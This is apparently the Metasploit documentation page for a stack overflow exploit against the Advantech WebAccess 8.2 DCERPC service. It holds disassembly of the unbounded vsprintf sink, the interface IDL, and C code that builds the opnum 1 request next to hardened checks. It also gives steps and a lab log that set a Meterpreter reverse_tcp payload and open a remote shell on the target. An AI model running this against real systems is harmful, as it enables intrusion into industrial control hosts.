metasploit-gs/documentation/modules/exploit/windows/scada/advantech_webaccess_webvrpcs_bof.md
2017-12-11 11:34:17 -06:00

Vulnerable Application

Advantech WebAccess <= 8.2

Vulnerability Analysis

The stack overflow happens in sub_10004BC8. Dest is a 0x800-byte stack buffer (byte ptr -800h), and the function hands its caller-supplied Format straight to ds:vsprintf with no length bound, so any output longer than 0x800 bytes runs over the saved EBP and then the return address at Dest+0x804:

.text:10004BC8 ; int __cdecl sub_10004BC8(char *Format, char)
.text:10004BC8 sub_10004BC8    proc near
.text:10004BC8
.text:10004BC8 lpWindowName    = dword ptr -818h
.text:10004BC8 hWnd            = dword ptr -814h
.text:10004BC8 lpClassName     = dword ptr -810h
.text:10004BC8 Args            = dword ptr -80Ch
.text:10004BC8 lpBaseAddress   = dword ptr -808h
.text:10004BC8 hFileMappingObject= dword ptr -804h
.text:10004BC8 Dest            = byte ptr -800h
.text:10004BC8 Format          = dword ptr  8
.text:10004BC8 arg_4           = byte ptr  0Ch
.text:10004BC8
.text:10004BC8                 push    ebp
.text:10004BC9                 mov     ebp, esp
.text:10004BCB                 sub     esp, 818h
.text:10004BD1                 mov     [ebp+lpWindowName], offset aDebugScreen1    ; "Debug Screen1"
.text:10004BDB                 mov     [ebp+lpClassName], offset aDebugwclass1     ; "debugWClass1"
.text:10004BE5                 lea     eax, [ebp+arg_4]
.text:10004BE8                 mov     [ebp+Args], eax
.text:10004BEE                 mov     ecx, [ebp+Args]
.text:10004BF4                 push    ecx                                         ; Args
.text:10004BF5                 mov     edx, [ebp+Format]
.text:10004BF8                 push    edx                                         ; Format
.text:10004BF9                 lea     eax, [ebp+Dest]
.text:10004BFF                 push    eax                                         ; Dest
.text:10004C00                 call    ds:vsprintf                                 ; overflow

The corresponding IDL for the DCERPC interface through which this code is reached is below. Opnum 1 (sub_401260) is the entry point: arg_5 is a caller-sized char buffer whose length is arg_4 (declared size_is(arg_4)), which is the caller-controlled input the module delivers:

[
 uuid(5d2b62aa-ee0a-4a95-91ae-b064fdb471fc),
 version(1.0)
]

interface target_interface
{

/* opcode: 0x01, address: 0x00401260 */

void sub_401260 (
 [in] handle_t  arg_1,
 [in] long  arg_2,
 [in] long  arg_3,
 [in] long  arg_4,
 [in][ref][size_is(arg_4)] char * arg_5,
 [out][ref] long * arg_6
);

}
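As an added example (not the module's code and not the service's own), here is a C model of the two halves described above: the opnum 1 request stub marshalled from the IDL, and the sink from the disassembly shown beside a hardened version. The NDR layout follows the IDL (handle_t is a primitive binding handle and is not transmitted; arg_5 is a conformant array carrying a 4-byte max count and trailing alignment to 4 bytes). MAX_ARG5 and the rejection checks in decode_opnum1 are assumptions about what a hardened service would do, and the sample arg_5 values are constructed.

```c
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DEST_SIZE 0x800   /* Dest = byte ptr -800h in sub_10004BC8 */
#define MAX_ARG5  0x400   /* assumed cap for a hardened service; the real one has none */

static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}
static uint32_t get_le32(const uint8_t *p)
{
    return p[0] | (p[1] << 8) | (p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* NDR stub for the [in] parameters of opnum 1: arg_2, arg_3, arg_4 as little-endian
 * longs, then arg_5 as a conformant array (4-byte max count equal to size_is(arg_4),
 * the bytes, zero padding to 4).  handle_t is not sent; arg_6 is [out] only.
 * Returns the stub length, or 0 if out is too small. */
size_t encode_opnum1(uint8_t *out, size_t out_len, uint32_t arg_2,
                     uint32_t arg_3, const uint8_t *arg_5, uint32_t arg_4)
{
    size_t pad = (4 - (arg_4 % 4)) % 4, need = 16 + arg_4 + pad;
    if (out_len < need) return 0;
    put_le32(out, arg_2);
    put_le32(out + 4, arg_3);
    put_le32(out + 8, arg_4);
    put_le32(out + 12, arg_4);
    memcpy(out + 16, arg_5, arg_4);
    memset(out + 16 + arg_4, 0, pad);
    return need;
}

/* Server-side parse with the checks the vulnerable service lacks: max count must
 * equal arg_4, the bytes must be present, length under MAX_ARG5 (assumed cap).
 * Returns the arg_5 length and points *arg_5 into the stub, or -1 on rejection. */
int decode_opnum1(const uint8_t *stub, size_t stub_len, uint32_t *arg_2,
                  uint32_t *arg_3, const uint8_t **arg_5)
{
    if (stub_len < 16) return -1;
    uint32_t arg_4 = get_le32(stub + 8);
    if (get_le32(stub + 12) != arg_4) return -1;  /* conformance mismatch */
    if (arg_4 > MAX_ARG5) return -1;
    if (stub_len - 16 < arg_4) return -1;         /* truncated stub */
    *arg_2 = get_le32(stub);
    *arg_3 = get_le32(stub + 4);
    *arg_5 = stub + 16;
    return (int)arg_4;
}

/* The sink as disassembled: caller data is the vsprintf format and the write into
 * the 0x800-byte stack buffer is unbounded, so output past DEST_SIZE overwrites
 * saved EBP and then the return address at Dest+0x804.  Shown only for comparison. */
int debug_screen_unsafe(const char *format, ...)
{
    char dest[DEST_SIZE];
    va_list args;
    va_start(args, format);
    int n = vsprintf(dest, format, args);
    va_end(args);
    return n;
}

/* Hardened form: caller data is a %s argument (never the format), the length is
 * explicit because arg_5 is not NUL-terminated, and the write is bounded.
 * Returns bytes stored, or -1 if the message would not fit in Dest. */
int debug_screen_safe(const uint8_t *msg, size_t msg_len)
{
    char dest[DEST_SIZE];
    int n = snprintf(dest, sizeof dest, "%.*s", (int)msg_len, (const char *)msg);
    return (n < 0 || (size_t)n >= sizeof dest) ? -1 : n;
}

/* Constructed input: a 5-byte arg_5 round-trips and fits in Dest; returns 1. */
int check_short_roundtrip(void)
{
    static const uint8_t msg[] = "ABCDE";
    uint8_t stub[64];
    uint32_t a2 = 0, a3 = 0; const uint8_t *a5 = NULL;
    size_t n = encode_opnum1(stub, sizeof stub, 1, 2, msg, 5);
    int len = decode_opnum1(stub, n, &a2, &a3, &a5);
    return n == 24 && len == 5 && a2 == 1 && a3 == 2 &&
           memcmp(a5, msg, 5) == 0 && debug_screen_safe(a5, 5) == 5;
}

/* Constructed input: a 0x900-byte arg_5 (longer than Dest) is refused by parser and
 * sink, and a stub whose max count disagrees with arg_4 is refused; returns 1. */
int check_rejections(void)
{
    static uint8_t big[0x900], stub[0x1000];
    uint32_t a2, a3; const uint8_t *a5;
    memset(big, 'A', sizeof big);
    size_t n = encode_opnum1(stub, sizeof stub, 1, 2, big, sizeof big);
    int oversized = decode_opnum1(stub, n, &a2, &a3, &a5) == -1 &&
                    debug_screen_safe(big, sizeof big) == -1;
    n = encode_opnum1(stub, sizeof stub, 1, 2, big, 8);
    put_le32(stub + 12, 9);                       /* max count != arg_4 */
    return oversized && decode_opnum1(stub, n, &a2, &a3, &a5) == -1;
}
```

Feed the bytes from encode_opnum1 as the stub data of a DCERPC request with opnum 1 to reproduce what the module sends; the two check functions can be called from a main() to confirm the round trip and the rejections. The important contrast is that decode_opnum1 validates the conformance count and caps the length before any copy, and debug_screen_safe never lets the caller's bytes act as the format string.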

Verification Steps

  1. Start msfconsole
  2. use exploit/windows/scada/advantech_webaccess_webvrpcs_bof
  3. set payload windows/meterpreter/reverse_tcp
  4. set RHOST XXX.XXX.XXX.XXX
  5. set LHOST XXX.XXX.XXX.XXX
  6. exploit
  7. Verify that a meterpreter session connects back

Options

None.

Scenarios

saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/advantech.rc 
[*] Processing scripts/advantech.rc for ERB directives.
resource (scripts/advantech.rc)> use exploit/windows/scada/advantech_webaccess_webvrpcs_bof
resource (scripts/advantech.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (scripts/advantech.rc)> set RHOST 172.16.175.136
RHOST => 172.16.175.136
resource (scripts/advantech.rc)> set LHOST 172.16.175.1
LHOST => 172.16.175.1
resource (scripts/advantech.rc)> exploit
[*] Started reverse TCP handler on 172.16.175.1:4444 
[*] 172.16.175.136:4592 - Binding to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ...
[*] 172.16.175.136:4592 - Bound to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ...
[+] 172.16.175.136:4592 - Got a handle: 0x01ef2558
[*] 172.16.175.136:4592 - Trying target Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31...
[*] Sending stage (179779 bytes) to 172.16.175.136
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.136:49206) at 2017-12-11 11:32:15 -0600
[*] 172.16.175.136:4592 - The DCERPC service did not reply to our request

meterpreter > shell
Process 5208 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\WebAccess\Node>